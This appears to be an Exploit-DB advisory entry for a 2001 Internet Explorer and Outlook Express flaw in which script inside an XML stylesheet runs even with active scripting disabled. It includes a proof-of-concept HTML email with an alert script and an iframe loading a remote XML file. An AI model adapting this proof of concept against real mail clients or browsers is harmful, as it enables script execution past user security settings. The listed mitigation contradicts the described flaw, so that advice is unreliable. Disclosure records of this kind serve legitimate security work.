XStyle Vulnerability

vendor:

Internet Explorer and Outlook Express

by:

Georgi Guninski

7.5

CVSS

HIGH

XML Stylesheet Injection

CWE

Product Name: Internet Explorer and Outlook Express

Affected Version From: Internet Explorer 5.0

Affected Version To: Outlook Express 5.5

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2001

A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. If active scripting is disabled in all security zones, IE and OE will still allow script to run if it is contained in the stylesheet of an XML page.

Mitigation:

Disable active scripting in all security zones.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2633/info

A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. If active scripting is disabled in all security zones, IE and OE will still allow script to run if it is contained in the stylesheet of an XML page. 

From: "georgi" 
Subject: xstyle
Date: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

------=_NextPart_000
Content-Type: text/html;
	charset="iso-8859-1"

test
<H1>
XStyle demo. Written by Georgi Guninski
</H1>

<SCRIPT>
alert("JS should not be working");
</SCRIPT>

<IFRAME SRC="http://www.guninski.com/xstyle.xml"></IFRAME>
------=_NextPart_000--